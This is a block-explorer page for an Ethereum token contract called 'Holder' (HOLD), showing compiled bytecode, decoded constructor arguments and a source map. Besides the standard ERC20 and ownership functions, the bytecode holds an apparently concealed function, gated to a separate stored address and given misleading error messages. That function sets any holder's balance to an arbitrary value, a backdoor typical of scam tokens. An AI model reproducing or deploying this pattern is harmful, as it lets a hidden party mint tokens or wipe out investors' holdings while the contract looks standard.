0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b8063715018a6146101b15780638da5cb5b146101bb57806395d89b41146101d6578063a191193e146101de57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610a88565b60405180910390f35b61012b610126366004610a1c565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b3660046109e1565b61030b565b60065460405160ff909116815260200161010f565b61012b610183366004610a1c565b610374565b61013f610196366004610995565b6001600160a01b031660009081526001602052604090205490565b6101b96103aa565b005b6000546040516001600160a01b03909116815260200161010f565b610102610415565b6101b96101ec366004610a45565b610424565b61012b6101ff366004610a1c565b610514565b61012b610212366004610a1c565b610563565b61013f6102253660046109af565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b961025e366004610995565b610570565b60606004805461027290610aff565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610aff565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461064e565b50600192915050565b6000610318848484610776565b61036a843361036585604051806060016040528060298152602001610b88602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fd565b61064e565b5060019392505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610365908661063b565b6000546001600160a01b031633146104095760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104136000610929565b565b60606005805461027290610aff565b6003546001600160a01b0316331461047e5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610400565b60018260ff1610156104e65760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b6064820152608401610400565b60006104f28183610adb565b6001600160a01b03909416600090815260016020526040902093909355505050565b6000610302338461036585604051806060016040528060268152602001610b3b602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fd565b6000610302338484610776565b6000546001600160a01b031633146105ca5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610400565b6001600160a01b03811661062f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b61063881610929565b50565b60006106478284610adb565b9392505050565b6001600160a01b0383166106b25760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610400565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610400565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107db5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b6001600160a01b03821661083d5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610400565b61087a81604051806060016040528060278152602001610b61602791396001600160a01b03861660009081526001602052604090205491906108fd565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108a9908261063b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107699085815260200190565b600081848411156109215760405162461bcd60e51b81526004016104009190610a88565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461099057600080fd5b919050565b6000602082840312156109a6578081fd5b61064782610979565b600080604083850312156109c1578081fd5b6109ca83610979565b91506109d860208401610979565b90509250929050565b6000806000606084860312156109f5578081fd5b6109fe84610979565b9250610a0c60208501610979565b9150604084013590509250925092565b60008060408385031215610a2e578182fd5b610a3783610979565b946020939093013593505050565b600080600060608486031215610a59578283fd5b610a6284610979565b9250602084013560ff81168114610a77578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610ab457858101830151858201604001528201610a98565b81811115610ac55783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610afa57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610b1357607f821691505b60208210811415610b3457634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220f366aa261100496bab2cc9feb2598a7f1f50dc5f43708580299023fa4a4b2f8d64736f6c63430008040033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000005979a4ff945fd68555e3479a078a02d9294a065c000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000006486f6c64657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004484f4c4400000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Holder
Arg [1] : symbol_ (string): HOLD
Arg [2] : decimals_ (uint8): 18
Arg [3] : currOwnershipAddr (address): 0x5979a4Ff945fd68555E3479A078a02D9294a065C
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 0000000000000000000000005979a4ff945fd68555e3479a078a02d9294a065c
Arg [4] : 000000000000000000000000000000000000000c9f2c9cd04674edea40000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 486f6c6465720000000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [8] : 484f4c4400000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13695:5872:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14557:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15592:210;;;;;;:::i;:::-;;:::i;:::-;;;2089:14:1;;2082:22;2064:41;;2052:2;2037:18;15592:210:0;2019:92:1;14858:108:0;14946:12;;14858:108;;;6028:25:1;;;6016:2;6001:18;14858:108:0;5983:76:1;15810:455:0;;;;;;:::i;:::-;;:::i;14759:91::-;14833:9;;14759:91;;14833:9;;;;6206:36:1;;6194:2;6179:18;14759:91:0;6161:87:1;16273:300:0;;;;;;:::i;:::-;;:::i;14974:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15125:18:0;15093:7;15125:18;;;:9;:18;;;;;;;14974:177;5489:94;;;:::i;:::-;;4838:87;4884:7;4911:6;4838:87;;-1:-1:-1;;;;;4911:6:0;;;1862:51:1;;1850:2;1835:18;4838:87:0;1817:102:1;14656:95:0;;;:::i;17758:325::-;;;;;;:::i;:::-;;:::i;16581:401::-;;;;;;:::i;:::-;;:::i;15159:216::-;;;;;;:::i;:::-;;:::i;15383:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15549:18:0;;;15517:7;15549:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15383:201;5738:192;;;;;;:::i;:::-;;:::i;14557:91::-;14602:13;14635:5;14628:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14557:91;:::o;15592:210::-;15711:4;15733:39;3636:10;15756:7;15765:6;15733:8;:39::i;:::-;-1:-1:-1;15790:4:0;15592:210;;;;:::o;15810:455::-;15950:4;15967:36;15977:6;15985:9;15996:6;15967:9;:36::i;:::-;16014:221;16037:6;3636:10;16085:139;16141:6;16085:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16085:19:0;;;;;;:11;:19;;;;;;;;3636:10;16085:33;;;;;;;;;;:37;:139::i;:::-;16014:8;:221::i;:::-;-1:-1:-1;16253:4:0;15810:455;;;;;:::o;16273:300::-;3636:10;16388:4;16482:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16482:34:0;;;;;;;;;;16388:4;;16410:133;;16460:7;;16482:50;;16521:10;16482:38;:50::i;5489:94::-;4884:7;4911:6;-1:-1:-1;;;;;4911:6:0;3636:10;5058:23;5050:68;;;;-1:-1:-1;;;5050:68:0;;4152:2:1;5050:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5050:68:0;;;;;;;;;5554:21:::1;5572:1;5554:9;:21::i;:::-;5489:94::o:0;14656:95::-;14703:13;14736:7;14729:14;;;;;:::i;17758:325::-;17043:8;;-1:-1:-1;;;;;17043:8:0;3636:10;17043:24;17025:74;;;;-1:-1:-1;;;17025:74:0;;5324:2:1;17025:74:0;;;5306:21:1;5363:2;5343:18;;;5336:30;5402:29;5382:18;;;5375:57;5449:18;;17025:74:0;5296:177:1;17025:74:0;17930:1:::1;17920:6;:11;;;;17898:104;;;::::0;-1:-1:-1;;;17898:104:0;;3740:2:1;17898:104:0::1;::::0;::::1;3722:21:1::0;3779:2;3759:18;;;3752:30;3818:34;3798:18;;;3791:62;-1:-1:-1;;;3869:18:1;;;3862:41;3920:19;;17898:104:0::1;3712:233:1::0;17898:104:0::1;18013:13;18065:10;18013:13:::0;18065:2;:10:::1;:::i;:::-;-1:-1:-1::0;;;;;18041:21:0;;::::1;;::::0;;;:9:::1;:21;::::0;;;;:34;;;;-1:-1:-1;;;17758:325:0:o;16581:401::-;16701:4;16723:229;3636:10;16773:7;16795:146;16852:15;16795:146;;;;;;;;;;;;;;;;;3636:10;16795:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16795:34:0;;;;;;;;;;;;:38;:146::i;15159:216::-;15281:4;15303:42;3636:10;15327:9;15338:6;15303:9;:42::i;5738:192::-;4884:7;4911:6;-1:-1:-1;;;;;4911:6:0;3636:10;5058:23;5050:68;;;;-1:-1:-1;;;5050:68:0;;4152:2:1;5050:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5050:68:0;4124:182:1;5050:68:0;-1:-1:-1;;;;;5827:22:0;::::1;5819:73;;;::::0;-1:-1:-1;;;5819:73:0;;3333:2:1;5819:73:0::1;::::0;::::1;3315:21:1::0;3372:2;3352:18;;;3345:30;3411:34;3391:18;;;3384:62;-1:-1:-1;;;3462:18:1;;;3455:36;3508:19;;5819:73:0::1;3305:228:1::0;5819:73:0::1;5903:19;5913:8;5903:9;:19::i;:::-;5738:192:::0;:::o;8924:98::-;8982:7;9009:5;9013:1;9009;:5;:::i;:::-;9002:12;8924:98;-1:-1:-1;;;8924:98:0:o;18943:382::-;-1:-1:-1;;;;;19079:19:0;;19071:69;;;;-1:-1:-1;;;19071:69:0;;4918:2:1;19071:69:0;;;4900:21:1;4957:2;4937:18;;;4930:30;4996:34;4976:18;;;4969:62;-1:-1:-1;;;5047:18:1;;;5040:35;5092:19;;19071:69:0;4890:227:1;19071:69:0;-1:-1:-1;;;;;19159:21:0;;19151:69;;;;-1:-1:-1;;;19151:69:0;;5680:2:1;19151:69:0;;;5662:21:1;5719:2;5699:18;;;5692:30;5758:34;5738:18;;;5731:62;-1:-1:-1;;;5809:18:1;;;5802:33;5852:19;;19151:69:0;5652:225:1;19151:69:0;-1:-1:-1;;;;;19233:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19285:32;;6028:25:1;;;19285:32:0;;6001:18:1;19285:32:0;;;;;;;;18943:382;;;:::o;17137:613::-;-1:-1:-1;;;;;17277:20:0;;17269:71;;;;-1:-1:-1;;;17269:71:0;;2926:2:1;17269:71:0;;;2908:21:1;2965:2;2945:18;;;2938:30;3004:34;2984:18;;;2977:62;-1:-1:-1;;;3055:18:1;;;3048:36;3101:19;;17269:71:0;2898:228:1;17269:71:0;-1:-1:-1;;;;;17359:23:0;;17351:72;;;;-1:-1:-1;;;17351:72:0;;4513:2:1;17351:72:0;;;4495:21:1;4552:2;4532:18;;;4525:30;4591:34;4571:18;;;4564:62;-1:-1:-1;;;4642:18:1;;;4635:34;4686:19;;17351:72:0;4485:226:1;17351:72:0;17516:109;17552:6;17516:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17516:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17496:17:0;;;;;;;:9;:17;;;;;;:129;;;;17659:20;;;;;;;:32;;17684:6;17659:24;:32::i;:::-;-1:-1:-1;;;;;17636:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17707:35;;;;;;;;;;17735:6;6028:25:1;;6016:2;6001:18;;5983:76;11203:240:0;11323:7;11384:12;11376:6;;;;11368:29;;;;-1:-1:-1;;;11368:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11419:5:0;;;11203:240::o;5938:173::-;5994:16;6013:6;;-1:-1:-1;;;;;6030:17:0;;;-1:-1:-1;;;;;;6030:17:0;;;;;;6063:40;;6013:6;;;;;;;6063:40;;5994:16;6063:40;5938:173;;:::o;14::1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;111:2;63:124;;;:::o;192:196::-;251:6;304:2;292:9;283:7;279:23;275:32;272:2;;;325:6;317;310:22;272:2;353:29;372:9;353:29;:::i;393:270::-;461:6;469;522:2;510:9;501:7;497:23;493:32;490:2;;;543:6;535;528:22;490:2;571:29;590:9;571:29;:::i;:::-;561:39;;619:38;653:2;642:9;638:18;619:38;:::i;:::-;609:48;;480:183;;;;;:::o;668:338::-;745:6;753;761;814:2;802:9;793:7;789:23;785:32;782:2;;;835:6;827;820:22;782:2;863:29;882:9;863:29;:::i;:::-;853:39;;911:38;945:2;934:9;930:18;911:38;:::i;:::-;901:48;;996:2;985:9;981:18;968:32;958:42;;772:234;;;;;:::o;1011:264::-;1079:6;1087;1140:2;1128:9;1119:7;1115:23;1111:32;1108:2;;;1161:6;1153;1146:22;1108:2;1189:29;1208:9;1189:29;:::i;:::-;1179:39;1265:2;1250:18;;;;1237:32;;-1:-1:-1;;;1098:177:1:o;1280:431::-;1355:6;1363;1371;1424:2;1412:9;1403:7;1399:23;1395:32;1392:2;;;1445:6;1437;1430:22;1392:2;1473:29;1492:9;1473:29;:::i;:::-;1463:39;;1552:2;1541:9;1537:18;1524:32;1596:4;1589:5;1585:16;1578:5;1575:27;1565:2;;1621:6;1613;1606:22;1565:2;1382:329;;1649:5;;-1:-1:-1;;;1701:2:1;1686:18;;;;1673:32;;1382:329::o;2116:603::-;2228:4;2257:2;2286;2275:9;2268:21;2318:6;2312:13;2361:6;2356:2;2345:9;2341:18;2334:34;2386:4;2399:140;2413:6;2410:1;2407:13;2399:140;;;2508:14;;;2504:23;;2498:30;2474:17;;;2493:2;2470:26;2463:66;2428:10;;2399:140;;;2557:6;2554:1;2551:13;2548:2;;;2627:4;2622:2;2613:6;2602:9;2598:22;2594:31;2587:45;2548:2;-1:-1:-1;2703:2:1;2682:15;-1:-1:-1;;2678:29:1;2663:45;;;;2710:2;2659:54;;2237:482;-1:-1:-1;;;2237:482:1:o;6253:229::-;6293:3;6324:1;6320:6;6317:1;6314:13;6311:2;;;-1:-1:-1;;;6350:33:1;;6406:4;6403:1;6396:15;6436:4;6357:3;6424:17;6311:2;-1:-1:-1;6467:9:1;;6301:181::o;6487:380::-;6566:1;6562:12;;;;6609;;;6630:2;;6684:4;6676:6;6672:17;6662:27;;6630:2;6737;6729:6;6726:14;6706:18;6703:38;6700:2;;;6783:10;6778:3;6774:20;6771:1;6764:31;6818:4;6815:1;6808:15;6846:4;6843:1;6836:15;6700:2;;6542:325;;;:::o

Swarm Source

ipfs://f366aa261100496bab2cc9feb2598a7f1f50dc5f43708580299023fa4a4b2f8d

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.